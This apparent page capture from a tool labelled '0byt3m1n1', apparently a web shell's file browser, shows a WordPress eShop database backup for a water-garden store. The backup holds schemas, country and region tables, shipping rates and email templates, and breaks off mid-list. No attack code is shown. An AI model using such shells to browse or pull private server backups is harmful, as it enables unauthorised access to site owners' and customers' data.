0byt3m1n1
Path:
/
data
/
0
/
0
/
80
/
111
/
80274
/
meta
/
81588
/
mysql.backup
/
[
Home
]
File: 1_0017987_0.mysqlv109.bak.sql
-- MySQL dump 10.11 -- -- Host: mysqlv109 Database: 1_0017987_0 -- ------------------------------------------------------ -- Server version 5.0.91 /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `wp_commentmeta` -- DROP TABLE IF EXISTS `wp_commentmeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_commentmeta` ( `meta_id` bigint(20) unsigned NOT NULL auto_increment, `comment_id` bigint(20) unsigned NOT NULL default '0', `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `comment_id` (`comment_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_commentmeta` -- LOCK TABLES `wp_commentmeta` WRITE; /*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_comments` -- DROP TABLE IF EXISTS `wp_comments`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_comments` ( `comment_ID` bigint(20) unsigned NOT NULL auto_increment, `comment_post_ID` bigint(20) unsigned NOT NULL default '0', `comment_author` tinytext NOT NULL, `comment_author_email` varchar(100) NOT NULL default '', `comment_author_url` varchar(200) NOT NULL default '', `comment_author_IP` varchar(100) NOT NULL default '', `comment_date` datetime NOT NULL default '0000-00-00 00:00:00', `comment_date_gmt` datetime NOT NULL default '0000-00-00 00:00:00', `comment_content` text NOT NULL, `comment_karma` int(11) NOT NULL default '0', `comment_approved` varchar(20) NOT NULL default '1', `comment_agent` varchar(255) NOT NULL default '', `comment_type` varchar(20) NOT NULL default '', `comment_parent` bigint(20) unsigned NOT NULL default '0', `user_id` bigint(20) unsigned NOT NULL default '0', PRIMARY KEY (`comment_ID`), KEY `comment_post_ID` (`comment_post_ID`), KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`), KEY `comment_date_gmt` (`comment_date_gmt`), KEY `comment_parent` (`comment_parent`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_comments` -- LOCK TABLES `wp_comments` WRITE; /*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_base_products` -- DROP TABLE IF EXISTS `wp_eshop_base_products`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_base_products` ( `post_id` bigint(20) NOT NULL default '0', `img` text NOT NULL, `brand` varchar(255) NOT NULL default '', `ptype` varchar(255) NOT NULL default '', `thecondition` varchar(255) NOT NULL default '', `expiry` date NOT NULL default '0000-00-00', `ean` varchar(255) NOT NULL default '', `isbn` varchar(255) NOT NULL default '', `mpn` varchar(255) NOT NULL default '', `qty` int(5) NOT NULL default '0', `xtra` text NOT NULL, PRIMARY KEY (`post_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_base_products` -- LOCK TABLES `wp_eshop_base_products` WRITE; /*!40000 ALTER TABLE `wp_eshop_base_products` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_eshop_base_products` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_countries` -- DROP TABLE IF EXISTS `wp_eshop_countries`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_countries` ( `code` char(2) NOT NULL default '', `country` varchar(50) NOT NULL default '', `zone` tinyint(1) NOT NULL default '0', `list` tinyint(1) NOT NULL default '1', PRIMARY KEY (`code`), KEY `zone` (`zone`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_countries` -- LOCK TABLES `wp_eshop_countries` WRITE; /*!40000 ALTER TABLE `wp_eshop_countries` DISABLE KEYS */; INSERT INTO `wp_eshop_countries` VALUES ('AD','Andorra',1,1),('AE','United Arab Emirates',2,1),('AG','Antigua and Barbuda',2,1),('AI','Anguilla',2,1),('AL','Albania',1,1),('AM','Armenia',1,1),('AN','Netherlands Antilles',2,1),('AO','Angola',2,1),('AR','Argentina',2,1),('AT','Austria',1,1),('AU','Australia',3,1),('AW','Aruba',2,1),('AZ','Azerbaijan Republic',1,1),('BA','Bosnia and Herzegovina',1,1),('BB','Barbados',2,1),('BE','Belgium',1,1),('BF','Burkina Faso',2,1),('BG','Bulgaria',1,1),('BH','Bahrain',2,1),('BI','Burundi',2,1),('BJ','Benin',2,1),('BM','Bermuda',2,1),('BN','Brunei',2,1),('BO','Bolivia',2,1),('BR','Brazil',2,1),('BS','Bahamas',2,1),('BT','Bhutan',2,1),('BW','Botswana',2,1),('BZ','Belize',2,1),('CA','Canada',2,1),('CD','Democratic Republic of the Congo',2,1),('CG','Republic of the Congo',2,1),('CH','Switzerland',1,1),('CK','Cook Islands',3,1),('CL','Chile',2,1),('CN','China',3,1),('CO','Colombia',2,1),('CR','Costa Rica',2,1),('CV','Cape Verde',2,1),('CY','Cyprus',1,1),('CZ','Czech Republic',1,1),('DE','Germany',1,1),('DJ','Djibouti',2,1),('DK','Denmark',1,1),('DM','Dominica',2,1),('DO','Dominican Republic',2,1),('DZ','Algeria',2,1),('EC','Ecuador',2,1),('EE','Estonia',1,1),('ER','Eritrea',2,1),('ES','Spain',1,1),('ET','Ethiopia',2,1),('FI','Finland',1,1),('FJ','Fiji',3,1),('FK','Falkland Islands',2,1),('FM','Federated States of Micronesia',3,1),('FO','Faroe Islands',1,1),('FR','France',1,1),('GA','Gabon Republic',2,1),('GB','United Kingdom',1,1),('GD','Grenada',2,1),('GF','French Guiana',2,1),('GI','Gibraltar',1,1),('GL','Greenland',1,1),('GM','Gambia',2,1),('GN','Guinea',2,1),('GP','Guadeloupe',3,1),('GR','Greece',1,1),('GT','Guatemala',2,1),('GW','Guinea Bissau',2,1),('GY','Guyana',2,1),('HK','Hong Kong',2,1),('HN','Honduras',2,1),('HR','Croatia',1,1),('HU','Hungary',1,1),('ID','Indonesia',2,1),('IE','Ireland',1,1),('IL','Israel',2,1),('IN','India',2,1),('IS','Iceland',1,1),('IT','Italy',1,1),('JM','Jamaica',2,1),('JO','Jordan',2,1),('JP','Japan',3,1),('KE','Kenya',2,1),('KG','Kyrgyzstan',1,1),('KH','Cambodia',2,1),('KI','Kiribati',3,1),('KM','Comoros',2,1),('KN','St. Kitts and Nevis',2,1),('KR','South Korea',3,1),('KW','Kuwait',2,1),('KY','Cayman Islands',2,1),('KZ','Kazakhstan',1,1),('LA','Laos',3,1),('LC','St. Lucia',2,1),('LI','Liechtenstein',1,1),('LK','Sri Lanka',2,1),('LS','Lesotho',2,1),('LT','Lithuania',1,1),('LU','Luxembourg',1,1),('LV','Latvia',1,1),('MA','Morocco',2,1),('MG','Madagascar',2,1),('MH','Marshall Islands',3,1),('ML','Mali',2,1),('MN','Mongolia',3,1),('MQ','Martinique',3,1),('MR','Mauritania',2,1),('MS','Montserrat',2,1),('MT','Malta',1,1),('MU','Mauritius',2,1),('MV','Maldives',2,1),('MW','Malawi',2,1),('MX','Mexico',2,1),('MY','Malaysia',2,1),('MZ','Mozambique',2,1),('NA','Namibia',2,1),('NC','New Caledonia',3,1),('NE','Niger',2,1),('NF','Norfolk Island',3,1),('NI','Nicaragua',2,1),('NL','Netherlands',1,1),('NO','Norway',1,1),('NP','Nepal',2,1),('NR','Nauru',3,1),('NU','Niue',3,1),('NZ','New Zealand',3,1),('OM','Oman',2,1),('PA','Panama',2,1),('PY','Paraguay',2,1),('PE','Peru',2,1),('PF','French Polynesia',3,1),('PG','Papua New Guinea',3,1),('PH','Philippines',3,1),('PL','Poland',1,1),('PM','St. Pierre and Miquelon',2,1),('PN','Pitcairn Islands',3,1),('PT','Portugal',1,1),('PW','Palau',3,1),('QA','Qatar',2,1),('RE','Reunion',2,1),('RO','Romania',1,1),('RU','Russia',1,1),('RW','Rwanda',2,1),('SA','Saudi Arabia',2,1),('SB','Solomon Islands',3,1),('SC','Seychelles',2,1),('SE','Sweden',1,1),('SG','Singapore',2,1),('SH','St. Helena',2,1),('SI','Slovenia',1,1),('SJ','Svalbard and Jan Mayen Islands',3,1),('SK','Slovakia',1,1),('SL','Sierra Leone',2,1),('SM','San Marino',1,1),('SN','Senegal',2,1),('SO','Somalia',2,1),('SR','Suriname',2,1),('ST','Sao Tome and Principe',2,1),('SV','El Salvador',2,1),('SZ','Swaziland',2,1),('TC','Turks and Caicos Islands',2,1),('TD','Chad',2,1),('TG','Togo',2,1),('TH','Thailand',2,1),('TJ','Tajikistan',1,1),('TM','Turkmenistan',1,1),('TN','Tunisia',2,1),('TO','Tonga',3,1),('TR','Turkey',1,1),('TT','Trinidad and Tobago',2,1),('TV','Tuvalu',3,1),('TW','Taiwan',3,1),('TZ','Tanzania',2,1),('UA','Ukraine',1,1),('UG','Uganda',2,1),('US','United States',2,1),('UY','Uruguay',2,1),('VA','Vatican City State',1,1),('VC','Saint Vincent and the Grenadines',2,1),('VE','Venezuela',2,1),('VG','British Virgin Islands',2,1),('VN','Vietnam',2,1),('VU','Vanuatu',3,1),('WF','Wallis and Futuna Islands',3,1),('WS','Samoa',3,1),('YE','Yemen',2,1),('YT','Mayotte',3,1),('ZA','South Africa',2,1),('ZM','Zambia',2,1); /*!40000 ALTER TABLE `wp_eshop_countries` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_discount_codes` -- DROP TABLE IF EXISTS `wp_eshop_discount_codes`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_discount_codes` ( `id` int(11) NOT NULL auto_increment, `dtype` tinyint(1) NOT NULL default '0', `disccode` varchar(255) NOT NULL default '', `percent` float(5,2) NOT NULL default '0.00', `remain` varchar(11) NOT NULL default '', `used` int(11) NOT NULL default '0', `enddate` date NOT NULL default '0000-00-00', `live` char(3) NOT NULL default 'no', PRIMARY KEY (`id`), UNIQUE KEY `disccode` (`disccode`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_discount_codes` -- LOCK TABLES `wp_eshop_discount_codes` WRITE; /*!40000 ALTER TABLE `wp_eshop_discount_codes` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_eshop_discount_codes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_download_orders` -- DROP TABLE IF EXISTS `wp_eshop_download_orders`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_download_orders` ( `id` int(11) NOT NULL auto_increment, `checkid` varchar(255) NOT NULL default '', `title` varchar(255) NOT NULL default '', `purchased` datetime NOT NULL default '0000-00-00 00:00:00', `files` varchar(255) NOT NULL default '', `downloads` smallint(1) NOT NULL default '3', `code` varchar(20) NOT NULL default '', `email` varchar(255) NOT NULL default '', PRIMARY KEY (`id`), KEY `code` (`code`,`email`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_download_orders` -- LOCK TABLES `wp_eshop_download_orders` WRITE; /*!40000 ALTER TABLE `wp_eshop_download_orders` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_eshop_download_orders` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_downloads` -- DROP TABLE IF EXISTS `wp_eshop_downloads`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_downloads` ( `id` int(11) NOT NULL auto_increment, `title` varchar(255) NOT NULL default '', `added` datetime NOT NULL default '0000-00-00 00:00:00', `files` varchar(255) NOT NULL default '', `downloads` int(11) NOT NULL default '0', `purchases` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_downloads` -- LOCK TABLES `wp_eshop_downloads` WRITE; /*!40000 ALTER TABLE `wp_eshop_downloads` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_eshop_downloads` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_emails` -- DROP TABLE IF EXISTS `wp_eshop_emails`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_emails` ( `id` int(11) NOT NULL auto_increment, `emailUse` tinyint(1) NOT NULL default '0', `emailType` varchar(50) NOT NULL default '', `emailSubject` varchar(255) NOT NULL default '', `emailContent` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_emails` -- LOCK TABLES `wp_eshop_emails` WRITE; /*!40000 ALTER TABLE `wp_eshop_emails` DISABLE KEYS */; INSERT INTO `wp_eshop_emails` VALUES (1,1,'Automatic default email','Your order from Build a Backyard Water Garden','[AUTO-RESPONSE - PLEASE DO NOT REPLY]\r\n\r\n Dear {FIRSTNAME},\r\n\r\n Your order has been received. Thank you! \r\n The details of your order follow...\r\n\r\n --------------- ORDER DETAILS ---------------\r\n\r\n {STATUS}\r\n {CART}\r\n\r\n\r\n --------------- DOWNLOAD DETAILS ---------------\r\n These are available for download via:\r\n {DOWNLOADS}\r\n\r\n\r\n --------------- CUSTOMER DETAILS ---------------\r\n\r\n {NAME}\r\n {ADDRESS}\r\n\r\n --------------- CONTACT DETAILS ---------------\r\n\r\n {CONTACT}\r\n\r\n --------------- OTHER INFORMATION (if applicable) ---------------\r\n\r\n {REFCOMM}\r\n ---\r\n\r\n If you have questions or concerns, please contact us.\r\n Thank you for ordering with us.'),(2,1,'Admin Order Form email','Build a Backyard Water Garden Notification','[SPECIAL COMMUNICATION/NOTIFICATION]\r\n\r\n Dear {FIRSTNAME},\r\n\r\n *** Enter a custom message here ***\r\n\r\n Respectfully,\r\n *** Enter your name, title, and email here ***\r\n\r\n\r\n\r\n --------------- ORDER DETAILS ---------------\r\n\r\n {STATUS}\r\n {CART}\r\n\r\n --------------- DOWNLOAD DETAILS ---------------\r\n These are available for download via:\r\n {DOWNLOADS}\r\n\r\n --------------- CUSTOMER DETAILS ---------------\r\n\r\n {NAME}\r\n {ADDRESS}\r\n\r\n --------------- CONTACT DETAILS ---------------\r\n\r\n {CONTACT}\r\n\r\n --------------- OTHER INFORMATION (if applicable) ---------------\r\n\r\n {REFCOMM}\r\n\r\n ---\r\n\r\n If you have questions or concerns, please contact us.\r\n Again, thank you for ordering with us.\r\n '),(3,0,'Automatic Paypal email','Your order from Build a Backyard Water Garden',''),(4,0,'Automatic Payson email','Your order from Build a Backyard Water Garden',''),(5,0,'Automatic Cash email','Your order from Build a Backyard Water Garden',''),(6,0,'Automatic ePN email','Your order from Build a Backyard Water Garden',''),(7,0,'Automatic webtopay email','Your order from Build a Backyard Water Garden',''),(8,0,'Automatic Authorize.net email','Your order from Build a Backyard Water Garden',''),(9,0,'Automatic iDeal Lite email','Your order from Build a Backyard Water Garden',''),(10,0,'Automatic ogone email','Your order from Build a Backyard Water Garden',''),(11,0,'Automatic Bank email','Your order from Build a Backyard Water Garden',''); /*!40000 ALTER TABLE `wp_eshop_emails` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_option_names` -- DROP TABLE IF EXISTS `wp_eshop_option_names`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_option_names` ( `optid` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `admin_name` varchar(255) NOT NULL default '', `type` tinyint(1) NOT NULL default '0', `description` varchar(255) NOT NULL default '', PRIMARY KEY (`optid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_option_names` -- LOCK TABLES `wp_eshop_option_names` WRITE; /*!40000 ALTER TABLE `wp_eshop_option_names` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_eshop_option_names` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_option_sets` -- DROP TABLE IF EXISTS `wp_eshop_option_sets`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_option_sets` ( `id` int(11) NOT NULL auto_increment, `optid` int(11) NOT NULL default '0', `name` varchar(255) NOT NULL default '', `price` float(16,2) NOT NULL default '0.00', `weight` float(8,2) NOT NULL default '0.00', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_option_sets` -- LOCK TABLES `wp_eshop_option_sets` WRITE; /*!40000 ALTER TABLE `wp_eshop_option_sets` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_eshop_option_sets` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_order_items` -- DROP TABLE IF EXISTS `wp_eshop_order_items`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_order_items` ( `id` int(11) NOT NULL auto_increment, `checkid` varchar(255) NOT NULL default '', `item_id` varchar(255) NOT NULL default '0', `item_qty` int(11) NOT NULL default '0', `item_amt` float(16,2) NOT NULL default '0.00', `tax_rate` varchar(255) NOT NULL default '', `tax_amt` varchar(255) NOT NULL default '', `optname` varchar(255) NOT NULL default '', `optsets` text NOT NULL, `post_id` int(11) NOT NULL default '0', `option_id` int(11) NOT NULL default '0', `down_id` int(11) NOT NULL default '0', `weight` float(16,2) NOT NULL default '0.00', PRIMARY KEY (`id`), KEY `custom_field` (`checkid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_order_items` -- LOCK TABLES `wp_eshop_order_items` WRITE; /*!40000 ALTER TABLE `wp_eshop_order_items` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_eshop_order_items` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_orders` -- DROP TABLE IF EXISTS `wp_eshop_orders`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_orders` ( `id` int(11) NOT NULL auto_increment, `checkid` varchar(255) NOT NULL default '', `status` set('Sent','Completed','Pending','Failed','Deleted','Waiting') NOT NULL default 'Pending', `first_name` varchar(50) NOT NULL default '', `last_name` varchar(50) NOT NULL default '', `company` varchar(255) NOT NULL default '', `email` varchar(100) NOT NULL default '', `phone` varchar(30) NOT NULL default '', `address1` varchar(255) NOT NULL default '', `address2` varchar(255) NOT NULL default '', `city` varchar(100) NOT NULL default '', `state` varchar(100) NOT NULL default '', `zip` varchar(20) NOT NULL default '', `country` varchar(3) NOT NULL default '', `reference` varchar(255) NOT NULL default '', `ship_name` varchar(100) NOT NULL default '', `ship_company` varchar(255) NOT NULL default '', `ship_phone` varchar(30) NOT NULL default '', `ship_address` varchar(255) NOT NULL default '', `ship_city` varchar(100) NOT NULL default '', `ship_state` varchar(100) NOT NULL default '', `ship_postcode` varchar(20) NOT NULL default '', `ship_country` varchar(3) NOT NULL default '', `custom_field` varchar(15) NOT NULL default '', `transid` varchar(255) NOT NULL default '', `comments` text NOT NULL, `thememo` text NOT NULL, `edited` datetime NOT NULL default '0000-00-00 00:00:00', `downloads` set('yes','no') NOT NULL default 'no', `admin_note` text NOT NULL, `paidvia` varchar(255) NOT NULL default '', `affiliate` varchar(255) NOT NULL default '', `user_id` int(11) NOT NULL, `user_notes` text NOT NULL, PRIMARY KEY (`id`), KEY `custom_field` (`checkid`), KEY `status` (`status`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_orders` -- LOCK TABLES `wp_eshop_orders` WRITE; /*!40000 ALTER TABLE `wp_eshop_orders` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_eshop_orders` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_rates` -- DROP TABLE IF EXISTS `wp_eshop_rates`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_rates` ( `id` int(11) NOT NULL auto_increment, `class` varchar(3) NOT NULL default '', `items` smallint(2) NOT NULL default '0', `zone1` float(16,2) NOT NULL default '0.00', `zone2` float(16,2) NOT NULL default '0.00', `zone3` float(16,2) NOT NULL default '0.00', `zone4` float(16,2) NOT NULL default '0.00', `zone5` float(16,2) NOT NULL default '0.00', `zone6` float(16,2) NOT NULL default '0.00', `zone7` float(16,2) NOT NULL default '0.00', `zone8` float(16,2) NOT NULL default '0.00', `zone9` float(16,2) NOT NULL default '0.00', `weight` float(16,2) NOT NULL default '0.00', `maxweight` varchar(16) NOT NULL default '', `area` varchar(50) NOT NULL default '', `rate_type` varchar(255) NOT NULL default 'shipping', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_rates` -- LOCK TABLES `wp_eshop_rates` WRITE; /*!40000 ALTER TABLE `wp_eshop_rates` DISABLE KEYS */; INSERT INTO `wp_eshop_rates` VALUES (1,'A',1,10.00,15.00,20.00,25.00,30.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'),(2,'B',1,15.00,20.00,30.00,40.00,50.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'),(3,'C',1,40.00,45.00,50.00,50.00,50.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'),(4,'D',1,30.00,35.00,40.00,40.00,40.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'),(5,'E',1,50.00,60.00,70.00,80.00,90.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'),(6,'A',2,5.00,8.00,10.00,15.00,10.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'),(7,'B',2,7.00,10.00,20.00,20.00,15.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'),(8,'C',2,20.00,25.00,40.00,25.00,20.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'),(9,'D',2,15.00,25.00,30.00,20.00,25.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'),(10,'E',2,25.00,30.00,60.00,40.00,30.00,0.00,0.00,0.00,0.00,0.00,'','','shipping'); /*!40000 ALTER TABLE `wp_eshop_rates` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_eshop_states` -- DROP TABLE IF EXISTS `wp_eshop_states`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_eshop_states` ( `id` int(11) NOT NULL auto_increment, `code` char(4) NOT NULL default '', `stateName` varchar(30) NOT NULL default '', `zone` tinyint(1) NOT NULL default '0', `list` char(2) NOT NULL default '', PRIMARY KEY (`id`), KEY `zone` (`zone`) ) ENGINE=MyISAM AUTO_INCREMENT=155 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_eshop_states` -- LOCK TABLES `wp_eshop_states` WRITE; /*!40000 ALTER TABLE `wp_eshop_states` DISABLE KEYS */; INSERT INTO `wp_eshop_states` VALUES (1,'AK','Alaska',5,'US'),(2,'HI','Hawaii',5,'US'),(3,'AL','Alabama',2,'US'),(4,'AZ','Arizona',4,'US'),(5,'AR','Arkansas',3,'US'),(6,'CA','California',5,'US'),(7,'CO','Colorado',4,'US'),(8,'CT','Connecticut',1,'US'),(9,'DE','Delaware',2,'US'),(10,'DC','District Of Columbia',2,'US'),(11,'FL','Florida',2,'US'),(12,'GA','Georgia',2,'US'),(13,'ID','Idaho',4,'US'),(14,'IL','Illinois',3,'US'),(15,'IN','Indiana',2,'US'),(16,'IA','Iowa',3,'US'),(17,'KS','Kansas',3,'US'),(18,'KY','Kentucky',2,'US'),(19,'LA','Louisiana',3,'US'),(20,'ME','Maine',1,'US'),(21,'MD','Maryland',2,'US'),(22,'MA','Massachusetts',1,'US'),(23,'MI','Michigan',2,'US'),(24,'MN','Minnesota',3,'US'),(25,'MS','Mississippi',3,'US'),(26,'MO','Missouri',3,'US'),(27,'MT','Montana',4,'US'),(28,'NE','Nebraska',3,'US'),(29,'NV','Nevada',5,'US'),(30,'NH','New Hampshire',1,'US'),(31,'NJ','New Jersey',2,'US'),(32,'NM','New Mexico',4,'US'),(33,'NY','New York',2,'US'),(34,'NC','North Carolina',2,'US'),(35,'ND','North Dakota',3,'US'),(36,'OH','Ohio',2,'US'),(37,'OK','Oklahoma',3,'US'),(38,'OR','Oregon',5,'US'),(39,'PA','Pennsylvania',2,'US'),(40,'RI','Rhode Island',1,'US'),(41,'SC','South Carolina',2,'US'),(42,'SD','South Dakota',3,'US'),(43,'TN','Tennessee',3,'US'),(44,'TX','Texas',3,'US'),(45,'UT','Utah',4,'US'),(46,'VT','Vermont',1,'US'),(47,'VA','Virginia',2,'US'),(48,'WA','Washington',5,'US'),(49,'WV','West Virginia',2,'US'),(50,'WI','Wisconsin',3,'US'),(51,'WY','Wyoming',4,'US'),(52,'AB','Alberta',3,'CA'),(53,'BC','British Columbia',3,'CA'),(54,'MB','Manitoba',3,'CA'),(55,'NB','New Brunswick',3,'CA'),(56,'NL','Newfoundland & Labrador',3,'CA'),(57,'NT','Northwest Territories',3,'CA'),(58,'NU','Nunavut',3,'CA'),(59,'NS','Nova Scotia',3,'CA'),(60,'ON','Ontario',3,'CA'),(61,'PE','Prince Edward Island',3,'CA'),(62,'QC','Quebec',3,'CA'),(63,'SK','Saskatchewan',3,'CA'),(64,'YU','Yukon',3,'CA'),(65,'Lond','London',1,'GB'),(66,'Beds','Bedfordshire',1,'GB'),(67,'Berk','Berkshire',1,'GB'),(68,'Buck','Buckinghamshire',1,'GB'),(69,'Camb','Cambridgeshire',1,'GB'),(70,'Ches','Cheshire',1,'GB'),(71,'Corn','Cornwall and Isles of Scilly',1,'GB'),(72,'Cumb','Cumbria',1,'GB'),(73,'Derb','Derbyshire',1,'GB'),(74,'Dev','Devon',1,'GB'),(75,'Dors','Dorset',1,'GB'),(76,'Durh','Durham',1,'GB'),(77,'ESus','East Sussex',1,'GB'),(78,'Esse','Essex',1,'GB'),(79,'Glos','Gloucestershire',1,'GB'),(80,'GL','Greater London',1,'GB'),(81,'GM','Greater Manchester',1,'GB'),(82,'Hamp','Hampshire',1,'GB'),(83,'Here','Herefordshire',1,'GB'),(84,'Hert','Hertfordshire',1,'GB'),(85,'Kent','Kent',1,'GB'),(86,'Lanc','Lancashire',1,'GB'),(87,'Leic','Leicestershire',1,'GB'),(88,'Linc','Lincolnshire',1,'GB'),(89,'Mers','Merseyside',1,'GB'),(90,'Norf','Norfolk',1,'GB'),(91,'NYor','North Yorkshire',1,'GB'),(92,'Nort','Northamptonshire',1,'GB'),(93,'Norh','Northumberland',1,'GB'),(94,'Nott','Nottinghamshire',1,'GB'),(95,'Ox','Oxfordshire',1,'GB'),(96,'Shrp','Shropshire',1,'GB'),(97,'Som','Somerset',1,'GB'),(98,'SYor','South Yorkshire',1,'GB'),(99,'Staf','Staffordshire',1,'GB'),(100,'Suff','Suffolk',1,'GB'),(101,'Surr','Surrey',1,'GB'),(102,'Tyne','Tyne and Wear',1,'GB'),(103,'Warw','Warwickshire',1,'GB'),(104,'WMid','West Midlands',1,'GB'),(105,'WSus','West Sussex',1,'GB'),(106,'WYor','West 